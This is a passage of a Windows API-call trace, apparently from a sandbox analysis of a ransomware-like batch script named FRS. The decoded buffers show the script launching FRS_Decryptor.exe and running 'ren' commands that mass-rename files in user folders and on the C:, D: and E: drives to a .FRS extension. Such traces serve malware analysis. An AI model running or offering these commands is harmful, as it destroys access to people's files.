lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0096.744] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0096.744] SetFilePointer (in: hFile=0x260, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0096.744] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0096.744] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0096.744] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.744] GetFileType (hFile=0x260) returned 0x1 [0096.744] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0096.744] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0096.744] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0096.744] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0096.744] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.744] GetFileType (hFile=0x260) returned 0x1 [0096.744] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0096.745] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0096.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.745] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.745] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.745] GetFileType (hFile=0x260) returned 0x1 [0096.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.745] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0096.745] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0096.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0096.745] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.745] GetFileType (hFile=0x260) returned 0x1 [0096.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0096.745] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0096.745] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0096.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0096.745] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.745] GetFileType (hFile=0x260) returned 0x1 [0096.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0096.745] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0096.745] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0096.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0096.745] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.745] GetFileType (hFile=0x260) returned 0x1 [0096.745] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0096.745] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0096.746] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0096.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0096.746] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.746] GetFileType (hFile=0x260) returned 0x1 [0096.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0096.746] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0096.746] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0096.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0096.746] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.746] GetFileType (hFile=0x260) returned 0x1 [0096.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0096.746] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0096.746] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0096.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0096.746] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.746] GetFileType (hFile=0x260) returned 0x1 [0096.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0096.746] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0096.746] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0096.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0096.746] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.746] GetFileType (hFile=0x260) returned 0x1 [0096.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0096.746] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.746] SetFilePointer (in: hFile=0x260, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0096.747] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0096.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0096.747] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.747] GetFileType (hFile=0x260) returned 0x1 [0096.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0096.747] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0096.747] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0096.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0096.747] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.747] GetFileType (hFile=0x260) returned 0x1 [0096.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0096.747] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0096.747] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0096.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0096.747] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.747] GetFileType (hFile=0x260) returned 0x1 [0096.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0096.747] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0096.747] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0096.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0096.747] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.747] GetFileType (hFile=0x260) returned 0x1 [0096.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0096.747] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0096.747] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0096.747] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0096.748] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.748] GetFileType (hFile=0x260) returned 0x1 [0096.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0096.748] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0096.748] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0096.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0096.748] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.748] GetFileType (hFile=0x260) returned 0x1 [0096.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0096.748] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0096.748] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0096.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0096.748] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.748] GetFileType (hFile=0x260) returned 0x1 [0096.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0096.748] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0096.748] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0096.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0096.748] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.748] GetFileType (hFile=0x260) returned 0x1 [0096.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0096.748] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0096.748] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0096.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0096.748] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.748] GetFileType (hFile=0x260) returned 0x1 [0096.748] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0096.749] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0096.749] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0096.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0096.749] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.749] GetFileType (hFile=0x260) returned 0x1 [0096.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0096.749] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0096.749] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0096.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0096.749] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.749] GetFileType (hFile=0x260) returned 0x1 [0096.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0096.749] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0096.749] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0096.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0096.749] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.749] GetFileType (hFile=0x260) returned 0x1 [0096.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0096.749] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0096.749] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0096.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0096.749] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.749] GetFileType (hFile=0x260) returned 0x1 [0096.749] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0096.749] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0096.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0096.750] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0096.750] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0096.750] _get_osfhandle (_FileHandle=3) returned 0x260 [0096.750] GetFileType (hFile=0x260) returned 0x1 [0096.750] SetFilePointer (in: 